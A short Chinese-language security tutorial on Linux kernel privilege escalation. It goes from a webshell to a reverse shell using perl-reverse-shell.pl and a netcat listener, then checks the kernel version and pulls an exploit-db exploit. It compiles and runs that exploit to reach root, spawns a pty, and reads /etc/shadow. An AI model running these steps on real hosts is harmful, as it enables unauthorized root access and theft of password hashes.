WEB安全第六章提權篇01 LINUX 核心漏洞提權
1、簡介
通常我們在擁有一個webshell的時候,一般權限都是WEB容器權限,如在iis就是iis使用者組權限,在apache 就是apache權限,一般都是權限較低,均可執行一些普通指令,如檢視目前使用者,網絡資訊,ip資訊等。如果我想進行内網滲透就必須将權限提權到最高,如系統權限 超級管理者權限。
2、建立互動shell
linux 提權 需要互動shell
可以使用工具 perl-reverse-shell.pl 建立 sockets
增加運作權限
chmod +x perl-reverse-shell.pl
本地使用nc 監聽端口
nc -vvlp 1234
http://www.moontester.com/upload/ec69e40706de8558e71cd85cd17589b3x.php

nc 監聽

3、檢視發行版
cat /etc/issue
cat /etc/*release
檢視核心版本
uname -a
4、查找可用的提權exp
https://www.exploit-db.com/
Linux
moonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32
:37 UTC 2015
x86_64 x86_64 x86_64 GNU/Linux
https://www.exploit-db.com/exploits/37292
5、進行提權
在目标機子編譯提權exp 如果編譯不成功在本地編譯後在上傳的目标上
gcc exp.c -o exp
增加運作權限 chmod +x exp
運作 ./exp

目前使用者從www-data提權到 root
切換shell
python -c ‘import pty; pty.spawn(“/bin/bash”)’
查詢目前使用者 id
查詢密文檔案
cat /etc/shadow

原創文章,作者:mOon,如若轉載,請注明出處:https://www.moonsec.com/archives/379